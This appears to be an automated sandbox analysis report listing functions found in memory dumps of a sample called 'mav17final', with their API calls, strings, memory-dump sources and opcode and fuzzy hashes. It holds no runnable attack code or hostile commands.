                                                  • Instruction ID: 25aee3dce1e9d636eda6a49f36fb0d98145df888ed22e6d369dea0764e48a182
                                                  • Opcode Fuzzy Hash: ba69f6be1e03f64db6319ffa1c479f40c92e1bf7f208d3a0c57e532b4c3c8d90
                                                  • Instruction Fuzzy Hash: 0A01FF62A09B8695EA548F29F85433827A1EF49FE6F18A031DB5D47354DE2CE494C700
                                                  Function 00007FF8B9F6B1F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Callable_CheckDeallocErr_String
                                                  • String ID: the errcheck attribute must be callable
                                                  • API String ID: 3907376375-3049503998
                                                  • Opcode ID: 40a5e4c9387a9eacadc56f8a50b5cb35d6fcf5bb7bd3e5eec0ef331718cf67ff
                                                  • Instruction ID: 3355ef21b50d20106e24a9c7c459dd61e7b8b6f244909cfbc1455bdb3a3f990b
                                                  • Opcode Fuzzy Hash: 40a5e4c9387a9eacadc56f8a50b5cb35d6fcf5bb7bd3e5eec0ef331718cf67ff
                                                  • Instruction Fuzzy Hash: 28F04422A0CEC281EE998FBDF95413823A0BF89BF6F589131CB5D46354DE2CD495C300
                                                  Function 00007FF8BA242630 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24266E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abortterminate
                                                  • String ID: MOC$RCC$csm
                                                  • API String ID: 661698970-2671469338
                                                  • Opcode ID: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
                                                  • Instruction ID: 720875cf72d265a6042c164f850b8f6405881dbde24945ceb9ba7e24f768d97f
                                                  • Opcode Fuzzy Hash: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
                                                  • Instruction Fuzzy Hash: D2F04932918607D2E750AF6AE28116836A5FB88FC4F0991B1DF4806296CF7CE4A0DB41
                                                  Function 00007FF8B9F69A20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Long_OccurredStringVoid
                                                  • String ID: integer expected
                                                  • API String ID: 1621529885-2140524511
                                                  • Opcode ID: 7b49f154c6c6e067b1201768131b658a8a7bf5851dad34e5bb971b0d47541ff1
                                                  • Instruction ID: 8b80de73f574404504a23a8c9ecce0375d37e1d99a7452c35f7b613932026b30
                                                  • Opcode Fuzzy Hash: 7b49f154c6c6e067b1201768131b658a8a7bf5851dad34e5bb971b0d47541ff1
                                                  • Instruction Fuzzy Hash: A7F03A25B08BC691EE448F5AE58427967A1EF4AFF6F18A030DB0E4B365DE2CD498C300
                                                  Function 00007FF8B90A120C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyLong_AsUnsignedLongLong.PYTHON311(?,?,00000006,00007FF8B90A0080), ref: 00007FF8B90A1219
                                                  • PyErr_Occurred.PYTHON311(?,?,00000006,00007FF8B90A0080), ref: 00007FF8B90A1222
                                                  • PyErr_SetString.PYTHON311(?,?,00000006,00007FF8B90A0080), ref: 00007FF8B90A5AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072699078.00007FF8B9091000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8B9090000, based on PE: true
                                                  • Associated: 00000002.00000002.2072666393.00007FF8B9090000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072810626.00007FF8B90B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9090000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_Long$Long_OccurredStringUnsigned
                                                  • String ID: Value too large for uint32_t type
                                                  • API String ID: 944333170-1712686559
                                                  • Opcode ID: 9bd35320a0081bffd2fdba9bc7a0431c058ebd7055e0bc2aeb8b7046bc9156ca
                                                  • Instruction ID: 0eb8baa7ae5d391c9bc979e2792e3977eeeb9c6526923214d51bcfd03ad31451
                                                  • Opcode Fuzzy Hash: 9bd35320a0081bffd2fdba9bc7a0431c058ebd7055e0bc2aeb8b7046bc9156ca
                                                  • Instruction Fuzzy Hash: 42F01C71B0CA8785EF505F6DF4841792364AF58BE8F189434DB0E8A365DE3CE4AA8780
                                                  Function 00007FF8B9F68162 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • second item in _fields_ tuple (index %zd) must be a C type, xrefs: 00007FF8B9F6817E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_FormatFreeMem_
                                                  • String ID: second item in _fields_ tuple (index %zd) must be a C type
                                                  • API String ID: 3237669406-2717732800
                                                  • Opcode ID: 6c5e0c61733740b2a0fd8058cc8b9152b4a417e0ab55625c6ded04eac5423bae
                                                  • Instruction ID: 543749af3d3939e4a0385413f5e3bbadc4ff790acfb8fca848f9604334d2048f
                                                  • Opcode Fuzzy Hash: 6c5e0c61733740b2a0fd8058cc8b9152b4a417e0ab55625c6ded04eac5423bae
                                                  • Instruction Fuzzy Hash: 8FE04C65A0CFC392FA949F2DE8540382760AF86FF6B141231DA1E527B0DE7CA549D205
                                                  Function 00007FF8BA24A058 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID:
                                                  • API String ID: 2943138195-0
                                                  • Opcode ID: 648336d396e82ff845145f22116d02ab074a94aa94e21a1e761fb2f6b175ab31
                                                  • Instruction ID: fa670d6b7e2460978671fe916f83814e08fafcdd78a511f4514500fa4f2735d0
                                                  • Opcode Fuzzy Hash: 648336d396e82ff845145f22116d02ab074a94aa94e21a1e761fb2f6b175ab31
                                                  • Instruction Fuzzy Hash: 8F916632E18A9399FB118B69D8403BC3BB1BB04B88F5481B6DF4D27695DF7DA845E340
                                                  Function 00007FF8BA24A814 Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+$NameName::
                                                  • String ID:
                                                  • API String ID: 168861036-0
                                                  • Opcode ID: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
                                                  • Instruction ID: 1cd373dbd38b0f7c56bf0a149ba1c84216894864d1f1b1e7bdb3d63d6ddb80e0
                                                  • Opcode Fuzzy Hash: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
                                                  • Instruction Fuzzy Hash: 30514472A28A5689FB118F29EA417BC37A1BB44F88F5884B1DF5E07795DF39E440E700
                                                  Function 00007FF8BA24CC48 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+$Replicator::operator[]
                                                  • String ID:
                                                  • API String ID: 3863519203-0
                                                  • Opcode ID: 59a8e1a8bea4fa0d3053ac7b282f3cf586ef513a0d49dabd13085b0ba4a6c699
                                                  • Instruction ID: d9639c8c6d767f2fd53c9d5f45070cd4e3a18faafae50e43425925752dbabda2
                                                  • Opcode Fuzzy Hash: 59a8e1a8bea4fa0d3053ac7b282f3cf586ef513a0d49dabd13085b0ba4a6c699
                                                  • Instruction Fuzzy Hash: 5E411072A08B9689EB01CF68D8413AC3BB0BB49B88F548076DF4D67799DF78E841D750
                                                  Function 00007FF8B9F6B42C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$DeallocFreeMallocmemcpy
                                                  • String ID:
                                                  • API String ID: 1346496523-0
                                                  • Opcode ID: 8c08fdf6c3f6743b583b35e04fc598e2fc29906b9b2b5698a8cb90300fdd1926
                                                  • Instruction ID: ff82498dc8d87c83796d8c6481478bbc68d93b9e44c5cd9020139c2790cafaa2
                                                  • Opcode Fuzzy Hash: 8c08fdf6c3f6743b583b35e04fc598e2fc29906b9b2b5698a8cb90300fdd1926
                                                  • Instruction Fuzzy Hash: F5215B62A1DB8282EB589F69E84003827A0FF49FE6B185535DB0D07754EF3CE461C340
                                                  Function 00007FF8B9F649BC Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Descr_Dict_ItemString
                                                  • String ID:
                                                  • API String ID: 975051370-0
                                                  • Opcode ID: cbfa8e76cbb37faade4b4752a761ba53e7deef88f0e4638b9d9c9114bc06fd37
                                                  • Instruction ID: 4bb4e3fa2a3bf0d196c9bd0f3666b8f746771ce727af8b00d4d1e3e3306e1513
                                                  • Opcode Fuzzy Hash: cbfa8e76cbb37faade4b4752a761ba53e7deef88f0e4638b9d9c9114bc06fd37
                                                  • Instruction Fuzzy Hash: 60114C21A0DB8285EE549F2AE95033966A0EF4ABF2F086130DF4E43B95DF3CD491C300
                                                  Function 00007FF8B9F615F4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F622B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B9F62301
                                                  • PyWeakref_NewProxy.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F6163E
                                                  • PyDict_SetItem.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F6165F
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F66A71
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6156A), ref: 00007FF8B9F66A80
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$CallDict_ItemMakeObject_ProxyWeakref_
                                                  • String ID:
                                                  • API String ID: 1512266493-0
                                                  • Opcode ID: edfa2a0c717579e9911386e870fa1321e468c4d2dd0d8facd930d0c933b2ac38
                                                  • Instruction ID: f6fa5ef99abaed462bd1273c119c72226c661bbc9498ffe5b75854219fe23717
                                                  • Opcode Fuzzy Hash: edfa2a0c717579e9911386e870fa1321e468c4d2dd0d8facd930d0c933b2ac38
                                                  • Instruction Fuzzy Hash: 42114C26A09BC285EA548F2AE8400797BA4FF4ABE6B1C9135DF5E077A5CE3CE451C340
                                                  Function 00007FF8B90C9B99 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocFreeMem_Thread_free_lock
                                                  • String ID:
                                                  • API String ID: 2783890233-0
                                                  • Opcode ID: 5aeb15387b95166676224402c5d5f2316a130d4eb9e2bcf5365a9fe41ac904a5
                                                  • Instruction ID: 5da973be86538b23f33de9fad92c686fde847ee6a4c2606d2ee50e19b143c1bd
                                                  • Opcode Fuzzy Hash: 5aeb15387b95166676224402c5d5f2316a130d4eb9e2bcf5365a9fe41ac904a5
                                                  • Instruction Fuzzy Hash: 6A114C32A0D68295EE1A9F69D99437C3375AF85B85F084031CB5E47693CF2CD85AC310
                                                  Function 00007FF8B90781C0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ErrorLastOpenProcess
                                                  • String ID:
                                                  • API String ID: 3379443537-0
                                                  • Opcode ID: 6b546dbecff8f1a26dce1183042867b9cf570910ff2c42ef26f65990958e394d
                                                  • Instruction ID: 4821e185b3dd3826f60fdfef9bba1ea5e39efeabbad09bb5fc019dc9335a2473
                                                  • Opcode Fuzzy Hash: 6b546dbecff8f1a26dce1183042867b9cf570910ff2c42ef26f65990958e394d
                                                  • Instruction Fuzzy Hash: C3F0A920F0DA8382FF594F6EA8842391A51AF687E1F041038DF0E43795EE3CE8878700
                                                  Function 00007FF8B9F6C458 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Object_Track
                                                  • String ID:
                                                  • API String ID: 887704541-0
                                                  • Opcode ID: 3d42f6f96641afa8e40a9b95133215a649903610cae807ab0b9964238f53290f
                                                  • Instruction ID: fc5a6ede63d476f20d777d1a17e993c1f82cfd439f55cbf0608eafd62376fc97
                                                  • Opcode Fuzzy Hash: 3d42f6f96641afa8e40a9b95133215a649903610cae807ab0b9964238f53290f
                                                  • Instruction Fuzzy Hash: 7A019636E0AB92C1EE99DF79E8541382764AF4ABB6B285130CB8D42754CE2DE441C350
                                                  Function 00007FF8B9F6C8D4 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: State_$EnsureInitializeInitializedRelease
                                                  • String ID:
                                                  • API String ID: 2621580956-0
                                                  • Opcode ID: 228736a826a5a1ff67be1b297f58c8bae0a48c2954096bea5476443be523e544
                                                  • Instruction ID: 1af53cce89f9c5c2177776f1878345d7119d1b8d1bcb7b606599d3c3d7c3dc7d
                                                  • Opcode Fuzzy Hash: 228736a826a5a1ff67be1b297f58c8bae0a48c2954096bea5476443be523e544
                                                  • Instruction Fuzzy Hash: 8DF03021B08BC182E7405F66F8440296A60AF5AFE1F6C5034EB8943715DE3CD4918700
                                                  Function 00007FF8B9076180 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Entry2
                                                  • String ID: (KKKKKKKK)$GetIfEntry() or GetIfEntry2() syscalls failed.
                                                  • API String ID: 1297607578-1738093298
                                                  • Opcode ID: 14c815fd6ae0ab3f5606a145089b887e96643bb891819ee114bb01040e452990
                                                  • Instruction ID: f97243bfd259a4d2ab97b7311aaa44c2c55a6cba890e7536167066b4c41e6e96
                                                  • Opcode Fuzzy Hash: 14c815fd6ae0ab3f5606a145089b887e96643bb891819ee114bb01040e452990
                                                  • Instruction Fuzzy Hash: 50515621A09BCA86EE548F29A84427D6BA0FF64BE5F084035DF4E47794EF3CE446C720
                                                  Function 00007FF8BA2449B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$CreateFrameInfo
                                                  • String ID: csm
                                                  • API String ID: 2697087660-1018135373
                                                  • Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                  • Instruction ID: a1d5a17aa86bceafa756fb287dc46e21ced2145a381fdfbbb37f225173f6d67f
                                                  • Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                  • Instruction Fuzzy Hash: 64512932A1878286EA20EB2AE15026E77A4FB88FD0F100575DF8D07B55DF3CE464DB00
                                                  Function 00007FF8BA249F44 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: void$void
                                                  • API String ID: 2943138195-3746155364
                                                  • Opcode ID: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
                                                  • Instruction ID: 10861b534a5df2eb0c98dfcdfda240223cd47e61f47d8a17b905e1ad0b8d99cd
                                                  • Opcode Fuzzy Hash: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
                                                  • Instruction Fuzzy Hash: 9C313A62E18B5698FB01CFA8E8811FC37B0BB48B88B444576EF4E56B59DF3CA144D750
                                                  Function 00007FF8B90760A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
